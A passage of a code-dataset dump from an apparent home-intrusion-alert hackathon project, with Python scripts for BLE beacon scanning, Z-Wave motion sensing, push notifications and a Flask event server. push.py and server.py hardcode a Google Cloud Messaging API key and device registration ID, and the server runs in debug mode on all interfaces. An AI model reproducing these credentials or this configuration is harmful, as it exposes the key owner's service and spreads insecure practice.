BASE_URL + \"/api/beacon\";\n\n\n public static boolean isServiceRunning(String className, Context context) {\n ActivityManager manager = (ActivityManager) context.getSystemService(Context.ACTIVITY_SERVICE);\n for (ActivityManager.RunningServiceInfo service : manager.getRunningServices(Integer.MAX_VALUE)) {\n if (className.equals(service.service.getClassName())) {\n return true;\n }\n }\n return false;\n }\n\n public static int getAppVersion(Context context) {\n try {\n PackageInfo packageInfo = context.getPackageManager()\n .getPackageInfo(context.getPackageName(), 0);\n return packageInfo.versionCode;\n } catch (PackageManager.NameNotFoundException e) {\n // should never happen\n throw new RuntimeException(\"Could not get package name: \" + e);\n }\n }\n}\n" }, { "alpha_fraction": 0.6856356263160706, "alphanum_fraction": 0.6938962936401367, "avg_line_length": 22.868131637573242, "blob_id": "31c09fc39b32181361dbc28c26f610a666b65df0", "content_id": "8c36c19bc5eda4f35a418ded55ea2cb45e741c32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2179, "license_type": "no_license", "max_line_length": 109, "num_lines": 91, "path": "/loop.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "import blescan\nimport sys\nimport bluetooth._bluetooth as bluez\nimport time\nimport pickledb\nimport commands\nimport requests\n\nfrom sensor import ZWay\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask import Flask, jsonify\nfrom server import Beacon\n\n\n#Sqlite acces\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///temp/test.db'\ndb = SQLAlchemy(app)\n\n#Beacon init\ndev_id = 0\ntry:\n\tsock = bluez.hci_open_dev(dev_id)\n\tprint \"ble thread started\"\nexcept:\n\tprint \"error accessing bluetooth device...\"\n\tsys.exit(1)\nblescan.hci_le_set_scan_parameters(sock)\nblescan.hci_enable_le_scan(sock)\n\n#ZWave sensors init\npdb = pickledb.load('movements.db', False)\nz = ZWay()\n\n#sys.path.append('/home/pi/workspace/cybercamp')\n#import sensor\n\ndef sensor():\n return z.getMovement()\n\n\ndef mashup(items):\n\titem = {}\n\tif(len(items) > 0):\n\t\titem['uuid'] = items[0]['uuid']\n\t\titem['major'] = items[0]['major']\n\t\titem['minor'] = items[0]['minor']\n\t\titem['distance'] = items[0]['distance']\n\t\tfor x in items:\n\t\t\titem['distance'] = item['distance'] + x['distance']\n\t\titem['distance'] = 
item['distance']/float(len(items))\n\t\treturn item\n\telse:\n\t\treturn None\n\n\ndef beacon_close():\n\treturnedList = blescan.parse_events(sock, 10)\n\tnewlist = sorted(returnedList, key=lambda k: k['distance']) \n\tbeacon = mashup(newlist)\n\n\tif(beacon is not None):\n\t\tthings = Beacon.query.all()\n\t\tfor x in things:\n\t\t\tif x.uuid.replace('-','') == beacon['uuid'] and x.major == beacon['major'] and x.major == beacon['major']:\n\t\t\t\treturn True\n\treturn False\n\ndef device_in_net():\n\tret = commands.getoutput(\"arp -an | grep cc:fa:00:f6:9b:d6\")\n\treturn not (ret == '')\n\nbeacon = False\nmovimiento = False\ndevice = False\n\nwhile True:\n\t# activate the sensor\n\t# check the database for recent movements\n\n\tnewbeacon = beacon_close()\n\tnewmovimiento = sensor()\n\tnewdevice = device_in_net()\n\n\tif((beacon != newbeacon) or (movimiento != newmovimiento) or (device != newdevice)):\n\t\tprint \"Event\"\n\t\tpayload = {'movimiento': newmovimiento, 'beacon': newbeacon, 'device': newdevice}\n\t\tr = requests.get(\"http://localhost:8080/event\", params=payload)\n\t\tmovimiento = newmovimiento\n\t\tbeacon = newbeacon\n\t\tdevice = newdevice\n\n\n\n\n\t\n\n" }, { "alpha_fraction": 0.6397849321365356, "alphanum_fraction": 0.6612903475761414, "avg_line_length": 22.25, "blob_id": "bd7db9bba104bca60dbf2b2eac8a8c57a6f356fb", "content_id": "b7d459790c7f8436447fbf4b978de0b04fed25b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 71, "num_lines": 8, "path": "/push.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "from gcm import GCM\n\ngcm = GCM('AIzaSyCxXaknhqHcNAxxSKGseYQrpgHB5COLF00')\ndata = {'type': 'value1', 'message': 'value2'}\ntry:\n\tgcm.plaintext_request(registration_id='APA91bGxJ3Y2n4pExPc8kX1PAyuARTuA9p8a3LxwTj9d6LbAQ3aE4TYeaJ13nxqDohOtBW0ief8VdQl_H4Zz31gm5Csa61eT68RyeudpJH7lwJrzy-5yl3VmvZzYU3uIOnYMTfSGMozmhkV6DfEGblz6xUGmLrYBxQ', data=data, retries=10 )\nexcept:\n\tprint 'fail'\n" }, { "alpha_fraction": 0.5555073618888855, "alphanum_fraction": 0.5660595297813416, "avg_line_length": 32.05741500854492, "blob_id": "9962565ed4b60de30248cdc2daa6a0d1ea6b59a4", "content_id": "20f29fd5964122c4372a8a8e8d9a0e1a789e06c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6919, "license_type": "no_license", "max_line_length": 135, "num_lines": 209, "path": "/sensor.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "#!/usr/bin/Python2.7\n# -*- coding: utf-8 -*-\nimport time\nimport pprint\nimport requests\nimport json\nimport sys\nimport pickle\nimport pickledb \nimport l8Signals\n\n#class made to recover from z-way-server the sensor data\n#gets the ip addres\n#returns the data\nclass ZWay:\n def __init__(self):\n #server ip & port:\n self.address = \"http://192.168.1.147:8083/\"\n\n #constants values of the ZWaveAPI\n self.getAllDataURL = 'ZWaveAPI/Data/0'\n self.getDeviceDataURL_1 = 'ZWaveAPI/Run/devices['\n self.getInquireURL = '].instances[0].commandClasses[0x30].Get()'\n self.getDeviceDataURL_2 = '].instances[0].commandClasses[0x30].data'\n\n\n def getMovement(self):\n deviceN_=self.getDevices()\n data=Render()\n for deviceNum in deviceN_ :\n info= self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getDeviceDataURL_2,'OK')\n if (not info == None):\n return info['1']['level']['value']\n return False\n\n\n def performGetRequest(self):\n\n #search 
for connected devices\n deviceN_=self.getDevices()\n data=Render()\n #TODO:test the devices that have no relevant data\n \n #for each one of the devices try to pull data\n for deviceNum in deviceN_ : \n #obtains last updateTime from the sensor\n \n\t #timeStam = data.getSensorUpdateTime(self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getDeviceDataURL_2,'OK'))\n \n #inquires the devices for new data\n #self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getInquireURL,None)\n \n #obtains again the updateTime from sensor\n #timeStam2 = data.getSensorUpdateTime(self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getDeviceDataURL_2,'OK'))\n #print 'inital time stamp: ',timeStam, ' actual time: ',time.time(), ' update time:',timeStam2\n #while the data has not been updated wait for 1 minute\n #info = None\n\t #print (\"timeStam \", timeStam, \">= timeStam2\", timeStam2)\n\t \n #while (timeStam >= timeStam2):\n #if (timeStam != timeStam2):\n #enquires again for UpdateTime\n # print \"waiting for sensor response...\"\n\n # time.sleep(10)\n info= self.getRequest(self.getDeviceDataURL_1+str(deviceNum)+self.getDeviceDataURL_2,'OK')\n #timeStam2 = data.getSensorUpdateTime(info)\n #new instances of the render clas that will be entitled to feed the Spring api server with the proper data\n\t if (not info == None):\n#\tprint data\n\t \tdata.initiate(info)\n\t \tprint \"Movimiento detectado\"\n#else:\n# raise MyException(str(e)), None, sys.exc_info()[2]\n\n\n def getSensorUpdateTime(self,jsonData):\n resp=None\n try:\n for id_, item in jsonData['1'].iteritems():\n if id_ == 'updateTime':\n resp = item\n except Exception as e:\n print 'ERROR during updating the Sensor Time:'\n raise MyException(str(e)), None, sys.exc_info()[2]\n return resp\n\n\n def getDevices(self):\n \n devicesList = []\n jsonDev=self.getRequest(self.getAllDataURL,'OK')\n try:\n for id_, item in jsonDev['devices'].iteritems():\n if id_ != '1' and item!=\"NoneType\":\n devicesList.append(id_)\n #print (id_ , item) \n\n except Exception as e:\n print 'ERROR during searching for devices'\n raise MyException(str(e)), None, sys.exc_info()[2]\n return None\n\n return devicesList\n\n\n def getRequest(self,direction,err):\n resp = None\n try:\n #print 'Sending a get request to: ',self.address+direction\n response = requests.get(self.address+direction)\n result=response.status_code\n if (result == 200 and err != None):\n resp = response.json()\n elif (result == 200 and err == None):\n resp = 'OK'\n except Exception as e:\n print 'ERROR sending a get request to this direction:',direction\n raise MyException(str(e)), None, sys.exc_info()[2]\n return resp\n\n\n#render class\nclass Render:\n def __init__(self):\n self.MAXFIELDS=10\n self.MINFIELDS=0 \n self.sensorList=[]\n self.db = pickledb.load('movements.db', False) \n \n self.setSTime( 0)\n\n def setSTime(self, value):\n self.db.set('valor', value)\n self.db.dump()\n\n def getSTime(self):\n\talgo=self.db.get('valor')\n return algo \n\n def initiate(self, sensorData):\n try:\n for i in range (self.MINFIELDS,self.MAXFIELDS):\n if str(i) in sensorData:\n self.processFields(self.recoverFields(sensorData,str(i)))\n #jsons=self.mountJSON()\n #self.sendDataSpring(jsons)\n except BaseException as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n\n def getSensorUpdateTime(self,jsonData):\n resp=None\n try:\n for id_, item in jsonData['1'].iteritems():\n if id_ == 'updateTime':\n resp = item\n except Exception as e:\n print 'ERROR during updating the Sensor Time:'\n 
raise MyException(str(e)), None, sys.exc_info()[2]\n return resp\n\n\n#******************\n#Aquí se recuperan los valores \n#******************\n def recoverFields(self,data,position):\n try:\n\t tiempo=0;\n\t valor=\"false\";\n for id_, item in data[position].iteritems():\n if not (id_ == 'sensorTypeString') and id_ == 'level':\n valor= self.getValue(item)\n tiempo= self.getTime(item)\n self.setSTime(valor)\n except Exception as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n return None\n \n\n def getValue(self, diction):\n try:\n for id_, item in diction.iteritems():\n if id_ == 'value' :\n return item\n except Exception as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n return None\n\n def getTime(self, diction):\n try:\n for id_, item in diction.iteritems():\n if id_ == 'updateTime' :\n return item\n except Exception as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n return None\n\n# raise MyException('Not Implemented yet')\n\n def processFields(self,model):\n try:\n if not model == None:\n self.sensorList.append(model)\n except Exception as e:\n raise MyException(str(e)), None, sys.exc_info()[2]\n\n\n#own type of exception\nclass MyException(Exception): pass \n\n" }, { "alpha_fraction": 0.5561877489089966, "alphanum_fraction": 0.6365576386451721, "avg_line_length": 20.798450469970703, "blob_id": "f4d51833580cf03a776b3330ddf49b9c4b20d53d", "content_id": "d1502f255b3b14e0536719d96a10c71c2727b7ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2812, "license_type": "no_license", "max_line_length": 388, "num_lines": 129, "path": "/l8Signals.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport time\nimport requests\nimport l8\nimport json\n\n#vars\ncolor_verde=l8.Colour(0,255,0)\ncolor_rojo=l8.Colour(255,0,0)\ncolor_blanco=l8.Colour(255,255,255)\n\n#symbol\nlist_d=[]\n\nlist_d.append((0,3))\nlist_d.append((2,3))\nlist_d.append((4,3))\nlist_d.append((1,3))\nlist_d.append((3,3))\nlist_d.append((5,3))\nlist_d.append((7,3))\nlist_d.append((0,4))\nlist_d.append((2,4))\nlist_d.append((4,4))\nlist_d.append((1,4))\nlist_d.append((3,4))\nlist_d.append((5,4))\nlist_d.append((7,4))\n\n\n\n\nlist_ok=[]\n\nlist_ok.append((3,3))\nlist_ok.append((3,4))\nlist_ok.append((4,2))\nlist_ok.append((4,3))\nlist_ok.append((2,0))\nlist_ok.append((3,0))\nlist_ok.append((3,1))\nlist_ok.append((4,1))\nlist_ok.append((0,6))\nlist_ok.append((0,7))\nlist_ok.append((1,5))\nlist_ok.append((1,6))\nlist_ok.append((2,4))\nlist_ok.append((2,5))\nlist_ok.append((4,2))\nlist_ok.append((5,1))\nlist_ok.append((5,2))\n\n\n\nlist_x=[]\n\nlist_x.append((0,0))\nlist_x.append((1,0))\nlist_x.append((1,1))\nlist_x.append((2,1))\nlist_x.append((2,2))\nlist_x.append((3,2))\nlist_x.append((3,3))\nlist_x.append((3,4))\nlist_x.append((4,3))\nlist_x.append((4,4))\nlist_x.append((5,4))\nlist_x.append((5,5))\nlist_x.append((6,5))\nlist_x.append((6,6))\nlist_x.append((7,6))\nlist_x.append((7,7))\nlist_x.append((0,6))\nlist_x.append((0,7))\nlist_x.append((1,5))\nlist_x.append((1,6))\nlist_x.append((2,4))\nlist_x.append((2,5))\nlist_x.append((4,2))\nlist_x.append((5,1))\nlist_x.append((5,2))\nlist_x.append((6,0))\nlist_x.append((6,1))\nlist_x.append((7,0))\nlist_x.append((4,4))\n\n\nclass ELE8:\n\tdef __init__(self):\n\t\t#l8 device\n\t\tself.l = l8.L8Bt(\"00:17:EC:4C:62:EE\")\n\t\treturn None\n\n\n\tdef initial(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_verde)\n\t\tprint 
(\"ENCENDER\")\n\t\t\n\tdef finalize(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_blanco)\n\n\tdef paint_x(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_rojo)\n\t\tfor i in list_x:\t\t\n\t\t\tself.l.set_light(i[0],i[1],color_rojo)\n\t\t\n\tdef paint_ok(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_verde)\n\t\tfor i in list_ok:\t\t\n\t\t\tself.l.set_light(i[0],i[1],color_verde)\n\n\tdef paint_d(self):\n\t\tself.l.send_clear()\n\t\tself.l.back_light(color_rojo)\n\t\tfor i in list_d:\t\t\n\t\t\tself.l.set_light(i[0],i[1],color_rojo)\n\n\tdef post_result(self):\n\t\tdata={\"user\":2,\"gameType\":\"Basic\",\"att1\":list_mov[0],\"att1_time\":0.8,\"att2\":list_mov[1],\"att2_time\":0.3,\"att3\":list_mov[2],\"att3_time\":1.8,\"att4\":list_mov[3],\"att4_time\":0.5,\"att5\":list_mov[4],\"att5_time\":2.8,\"att6\":list_mov[5],\"att6_time\":0.2,\"att7\":list_mov[6],\"att7_time\":0.9,\"att8\":list_mov[7],\"att8_time\":3.8,\"att9\":list_mov[8],\"att9_time\":0.8,\"att10\":list_mov[9],\"att10_time\":0.7}\n\t\tprint data\n\t\turl=\"http://192.168.1.12:8000/api/game/\"\n\t\th={'Content-type': 'application/json', 'Accept': 'application/json'}\n\t\tr=requests.post(url, data=json.dumps(data), headers=h)\n\t\tprint r\n" }, { "alpha_fraction": 0.6296296119689941, "alphanum_fraction": 0.6296296119689941, "avg_line_length": 26, "blob_id": "73a3aedd5b410938d70cb2f866b46acd2c8255f0", "content_id": "c215740477f8f68f09b3c51c8c2bf38754405a24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 27, "license_type": "no_license", "max_line_length": 26, "num_lines": 1, "path": "/Safe/settings.gradle", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "include ':app', ':beacons'\n" }, { "alpha_fraction": 0.7126436829566956, "alphanum_fraction": 0.7318007946014404, "avg_line_length": 25.100000381469727, "blob_id": "9b9392fd91dbc556a9eb38d514e85182225bd27e", "content_id": "0e6bae91653d48749db940714251b2ab9f71e88c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 261, "license_type": "no_license", "max_line_length": 64, "num_lines": 10, "path": "/Safe/beacons/src/main/java/com/beeva/beaconsutils/BluetoothLENotSuportedException.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.beeva.beaconsutils;\n\n/**\n * Created by marianclaudiu on 5/11/14.\n */\npublic class BluetoothLENotSuportedException extends Exception {\n public BluetoothLENotSuportedException() {\n super(\"Bluetooth LE Not supported on this device\");\n }\n}\n" }, { "alpha_fraction": 0.622613251209259, "alphanum_fraction": 0.6499438285827637, "avg_line_length": 25.700000762939453, "blob_id": "9e6db19f72a5651b17254d9c185454510881919f", "content_id": "067107ea70d4c267ab7cb3a2f1970b96e9e18cec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2671, "license_type": "no_license", "max_line_length": 231, "num_lines": 100, "path": "/server.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "#!flask/bin/python\nfrom l8Signals import ELE8\nfrom flask import Flask, jsonify\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom flask import request\nfrom gcm import GCM\nimport flask.ext.restless\nimport json\nimport time\nimport commands\nimport pickledb\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///temp/test.db'\ndb = SQLAlchemy(app)\n\nclass 
Beacon(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n uuid = db.Column(db.String(120))\n major = db.Column(db.Integer)\n minor = db.Column(db.Integer)\n\n def __init__(self, uuid, major, minor):\n self.uuid = uuid\n self.major = major\n self.minor = minor\n\n def __repr__(self):\n return '<Beacon %r>' % self.uuid\n\ndef send_push(type, description):\n gcm = GCM('AIzaSyCxXaknhqHcNAxxSKGseYQrpgHB5COLF00')\n data = {'type': type, 'message': description}\n try:\n gcm.plaintext_request(registration_id='APA91bGxJ3Y2n4pExPc8kX1PAyuARTuA9p8a3LxwTj9d6LbAQ3aE4TYeaJ13nxqDohOtBW0ief8VdQl_H4Zz31gm5Csa61eT68RyeudpJH7lwJrzy-5yl3VmvZzYU3uIOnYMTfSGMozmhkV6DfEGblz6xUGmLrYBxQ', data=data, retries=10 )\n except:\n print 'fail'\n\ndef send_intrusion():\n send_push('Intrusion', 'Alguien no autorizada ha entrado en el hogar')\n\ndef send_entrada_salida():\n send_push('Acceso', 'Alguien conocido ha entrado en casa')\n\n\[email protected]('/event', methods=['GET'])\ndef get_events():\n pdb = pickledb.load('movements.db', False)\n status = pdb.get('status')\n beacon = request.args.get('beacon',False,type=bool)\n device = request.args.get('device',False,type=bool)\n movement = request.args.get('movement', False, type=bool)\n if(not beacon and not device and movement and status != 0):\n send_intrusion()\n x8 = ELE8()\n x8.initial()\n x8.paint_d()\n time.sleep(5)\n x8.finalize()\n status = 0\n elif(beacon or device):\n if(not device and status != 2):\n x = commands.getoutput(\"sudo bash changeDNS.sh -f\")\n status = 2\n elif(status != 3):\n x = commands.getoutput(\"sudo bash changeDNS.sh -o\")\n status = 3\n else:\n status = 1\n send_entrada_salida()\n x8 = ELE8()\n x8.initial()\n x8.paint_ok()\n time.sleep(5)\n x8.finalize()\n else:\n status = 4\n pdb.set('status',status)\n pdb.dump()\n return \"Yeah\"\n\[email protected]('/open', methods=['GET'])\ndef get_open():\n send_entrada_salida()\n x8 = ELE8()\n x8.initial()\n x8.paint_ok()\n time.sleep(5)\n x8.finalize()\n return 'Yeah'\n\nmanager = flask.ext.restless.APIManager(app, flask_sqlalchemy_db=db)\n\nmanager.create_api(Beacon, methods=['GET', 'POST', 'DELETE'])\n\n\nif __name__ == '__main__':\n\n app.run(debug=True, host='0.0.0.0', port=8080)\n\n" } ]
16
GrahamOMalley/spiderBro
https://github.com/GrahamOMalley/spiderBro
107fb2d03a87a8a02607aad8cd8bb51befd6ab44
53379cc41128a714e30551fe946f587ad60e72c8
fc93b3817f1fb8bb6c5a37884790741d34ba1707
refs/heads/master
2020-04-26T02:53:40.981210
2015-05-11T10:19:33
2015-05-11T10:19:33
1,685,002
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.565805196762085, "alphanum_fraction": 0.5704439878463745, "avg_line_length": 36.914573669433594, "blob_id": "0ea7c3877e0f75c08732a46fd888c4040230a3bc", "content_id": "6285330caed8704b71a6685386223cfe914d5de5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7545, "license_type": "no_license", "max_line_length": 180, "num_lines": 199, "path": "/file_renamer.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/env python\nimport sys \nfrom datetime import datetime\nimport os\nimport shutil\nimport sqlite3\nimport subprocess\nimport fnmatch\nimport logging\nimport gomXBMCTools\n\n##########\nprint('os.cwd:')\nprint(os.getcwd())\n\nprint('file (arg[0]):')\nprint(sys.argv[0])\n\n# its [0] of the split statement\nprint('file dir (arg[0]):')\nprint(os.path.split(sys.argv[0]))\n##########\n\ndbfile = \"/home/gom/code/python/spider_bro/spiderbro.db\" \nlogdir= \"/home/gom/log/spiderbro\"\ntarget = \"/media/nasGom/video/tv/\"\nid = sys.argv[1]\nname = sys.argv[2]\npath = sys.argv[3]\nstart_time = str(datetime.today()).split(\".\")[0].replace(\" \", \"_\")\nstart_day = str(datetime.today()).split(\" \")[0]\n\nlogger = logging.getLogger('filerenamer')\nformatter = logging.Formatter('[%(asctime)s] [%(levelname)s] %(message)s')\nhandler_stream = logging.StreamHandler()\nhandler_stream.setFormatter(formatter)\nhandler_stream.setLevel(logging.CRITICAL)\nlogger.addHandler(handler_stream)\nhandler_file = logging.FileHandler('%s/spiderBro_%s.log' % (logdir, start_day))\nhandler_file.setFormatter(formatter)\nlogger.addHandler(handler_file)\nlogger.setLevel(logging.INFO)\nlogger.info('')\nlogger.info('File Renamer Started...')\nlogger.info('Target Dir to write files is: %s' % target)\n\nlogger.info('Torrent id is: %s' % sys.argv[1])\nlogger.info('Torrent name is: %s' % sys.argv[2])\nlogger.info('Torrent save path is: %s' % sys.argv[3])\n#sys.exit()\n\ndef is_video_file(filename, extensions=['.avi', '.mkv', '.mp4', '.flv', '.divx', '.mpg', '.mpeg', '.wmv']):\n return any(filename.lower().endswith(e) for e in extensions)\n\ndef findInPath(prog):\n for path in os.environ[\"PATH\"].split(os.pathsep):\n exe_file = os.path.join(path, prog)\n if os.path.exists(exe_file) and os.access(exe_file, os.X_OK):\n return exe_file\n return False\n\ndef unrar(filePath):\n unrarprog = \"unrar\"\n if unrarprog:\n rardir=os.path.dirname(filePath)\n command=[unrarprog,'e',filePath]\n logger.info(\"Unrar: Extracting %s\" % filePath)\n r = subprocess.Popen(command, cwd=rardir,shell=False).wait()\n if r == 0:\n logger.info(\"Unrar: Extracted %s\" % filePath)\n else:\n logger.info(\"Unrar: Error exctracting %s\" % filePath)\n else:\n logger.info(\"Unrar: Unable to find unrar executable\")\n\n\nif (not os.path.exists(dbfile)):\n logger.info(\"cannot find db...\")\n sys.exit()\nelse:\n files_to_copy = []\n # spiderbro stores path\n conn = sqlite3.connect(dbfile)\n cur = conn.cursor()\n sname = path\n select = \"select * from urls_seen where savepath like \\\"%\" + sname + \"%\\\"\"\n logger.info( \"Retrieving ep info with query: %s\" % (select))\n for c in(cur.execute(select)):\n file_path = path+\"/\"+name\n file_to_copy = path+\"/\"+name\n logger.info(\"Filepath: %s\" % (file_path))\n if(not os.path.isdir(file_path)):\n # we just have a single video file, copy\n files_to_copy.append(file_path)\n else:\n # we have a dir and are not sure whats in it, do some file manipulation before copying\n\n # 'Sample' files screw up 
logic if they are not deleted first\n logger.info( \"Checking for sample...\")\n for root, dirs, files in os.walk(file_path):\n for dirname in fnmatch.filter(dirs, \"*Sample*\"):\n logger.info( \"Sample dir detected, deleting... \", dirname)\n shutil.rmtree(os.path.join(root,dirname))\n\n # walk dir, find any zip or rar\n logger.info( \"Checking for archives...\")\n for pattern in (\"*.zip\", \"*.rar\"):\n for root, dirs, files in os.walk(file_path):\n for filename in fnmatch.filter(files, pattern):\n # extract files\n archive_file = ( os.path.join(root, filename))\n logger.info( archive_file)\n if pattern == \"*.rar\":\n logger.info( \"trying to unrar...\")\n unrar(archive_file)\n else:\n # TODO: implement unzip\n logger.info( \"trying to unzip\")\n \n logger.info( \"Checking for video files...\")\n # walk dir, find any video files \n for root, dirs, files in os.walk(file_path):\n for vfilename in filter(is_video_file, files):\n logger.info( \"Found file: %s\" % (vfilename))\n files_to_copy.append( os.path.join(root, vfilename))\n\n # use creation logic from backup_tv.py to mv and rename episode\n s = \"0\" + str(c[1]) if(int(c[1])<10) else str(c[1])\n season_dir = \"season_\" + s\n series_name = gomXBMCTools.normaliseTVShowName(str(c[0]))\n\n if not os.path.isdir(target + series_name): \n logger.info( \"\\tDirectory: %s does not exist, creating...\" % (series_name))\n os.mkdir(target+series_name)\n \n if not os.path.isdir(target + series_name + \"/\" + season_dir):\n logger.info( \"\\tDirectory: %s does not exist, creating...\" % (season_dir))\n os.mkdir(target + series_name + \"/\" + season_dir)\n \n rmdir = True\n for f in files_to_copy:\n e = \"e0\" + str(c[2]) if(int(c[2])<10) else \"e\" + str(c[2])\n # TODO: this is broken\n if( c[2] == -1): \n e = gomXBMCTools.getEpisodeNumFromFilename(f, s)\n\n if( e != \"e-1\" ):\n fileName, fileExtension = os.path.splitext(f)\n ftarget = target + series_name + \"/\" + season_dir + \"/\" + series_name + \"_s\"+ s + e + fileExtension\n logger.info( \"---> Copying File: %s to %s\" % (f, ftarget))\n shutil.copy2(f, ftarget)\n else:\n logger.info(\"Copying file without renaming: %s\" % (f))\n ftarget = target + series_name + \"/\" + season_dir + \"/\" \n shutil.copy2(f, ftarget)\n #rmdir = False\n if rmdir:\n logger.info(\"Cleaning up temporary dir %s\" % (path))\n shutil.rmtree(path)\n\n from deluge.ui.client import client\n from twisted.internet import reactor, defer\n from deluge.log import setupLogger\n setupLogger()\n\n def printSuccess(dresult, is_success, smsg):\n print \"[+]\", smsg\n\n def printError(emsg):\n print \"[e]\", emsg\n\n def printReport(rresult):\n print rresult\n\n def dl_finish(result):\n print \"All deferred calls have fired, exiting program...\"\n client.disconnect()\n # Stop the twisted main loop and exit\n reactor.stop()\n\n def on_connect_fail(result):\n print \"Connection failed!\"\n print \"result:\", result\n\n def on_connect_success(result):\n print \"Connection was successful!\"\n torrent_id = id\n tlist = []\n successmsg = \" Removed\"\n errormsg = \"Error removing\"\n do_remove_data = False\n tlist.append(client.core.remove_torrent(torrent_id, do_remove_data).addCallbacks(printSuccess, printError, callbackArgs = (True, successmsg), errbackArgs = (errormsg)))\n defer.DeferredList(tlist).addCallback(printReport)\n defer.DeferredList(tlist).addCallback(dl_finish)\n\n d = client.connect()\n d.addCallback(on_connect_success)\n d.addErrback(on_connect_fail)\n reactor.run()\n" }, { "alpha_fraction": 0.6197232007980347, 
"alphanum_fraction": 0.620415210723877, "avg_line_length": 34.24390411376953, "blob_id": "b76732acb291b4c2d8b585d90de8c1380c098612", "content_id": "c4de47cd388634ccd16c22907237d926195b5005", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2890, "license_type": "no_license", "max_line_length": 113, "num_lines": 82, "path": "/spiderBro.py", "repo_name": "GrahamOMalley/spiderBro", "src_encoding": "UTF-8", "text": "#! /usr/bin/python\n#################################################################################################################\n#\n# Script to scan thetvdb.com for series info, compare list of episodes to the xbmc\n# mysql DB, and attempt to download missing torrents from piratebay/btjunkie\n# using the deluge rpc interface\n#\n#################################################################################################################\nimport socket\nfrom datetime import datetime\nfrom spiderBroAPI import *\n\nstartTime = datetime.now()\ne_masks = [SNEN, NxN, NNN]\ns_masks = [Season, Series]\nignore_taglist = [\"SWESUB\", \"SPANISH\", \"GERMAN\", \"HBOGO\"]\nsearch_list = [PirateBaySearch]\nsearch_list = [KATSearch]\n#search_list = [ExtraTorrentSearch]\nsocket.setdefaulttimeout(10)\n\n# Get our config file and script arguments\nscript_args = get_configuration()\n\n# Get an instance of spiderBro, tell it to search for torrents\nspider = SpiderBro(script_args, e_masks, s_masks, ignore_taglist, search_list)\ntorrent_download_list = spider.get_torrent_download_list()\n\n# Deferred callbacks for twisted\ndef on_connect_fail(result):\n \"\"\"\n Deferred callback function to be called when an error is encountered\n \"\"\"\n l = logging.getLogger('spiderbro')\n l.info(\"Connection failed!\")\n l.info(\"result: %s\" % result)\n sys.exit()\n\n\ndef on_connect_success(result):\n \"\"\"\n Deferred callback function called when we connect\n \"\"\"\n d = db_manager()\n l = logging.getLogger('spiderbro')\n init_list = []\n l.info(\"Connection to deluge was successful, result code: %s\" % result)\n # need a callback for when torrent added completes\n def add_tor(key, val):\n l.info(\"---> Added Torrent: %s\" % (val))\n \n for tp in torrent_download_list:\n di = {'download_location':tp['save_dir']}\n # added support for magnet links\n if(str(tp[\"url\"]).startswith(\"magnet:\")):\n df = client.core.add_torrent_magnet(tp[\"url\"], di).addCallback(add_tor, tp[\"url\"])\n else:\n df = client.core.add_torrent_url(tp[\"url\"], di).addCallback(add_tor, tp[\"url\"])\n init_list.append(df)\n #add url to database - ideally would be nice to do this in callback, but dont have info there?\n d.add_to_urls_seen(tp['showname'], tp['season'], tp['episode'], tp['url'], tp['save_dir'])\n\n dl = defer.DeferredList(init_list)\n dl.addCallback(dl_finish)\n\ndef dl_finish(result):\n \"\"\"\n Deferred callback function for clean exit\n \"\"\"\n l = logging.getLogger('spiderbro')\n l.info(\"All deferred calls have fired, exiting program...\")\n client.disconnect()\n # Stop the twisted main loop and exit\n reactor.stop()\n\n# Connect to a daemon running on the localhost\nd = client.connect()\nd.addCallback(on_connect_success)\nd.addErrback(on_connect_fail)\n\n# Run the twisted main loop to make everything go\nreactor.run()\n" }, { "alpha_fraction": 0.7625418305397034, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 22, "blob_id": "38a35f6e9a442eeb9f89fc739fbd8c0ca95d2a3e", "content_id": "1c55c7368af93980e4c302c1df289bca075e3d48", 
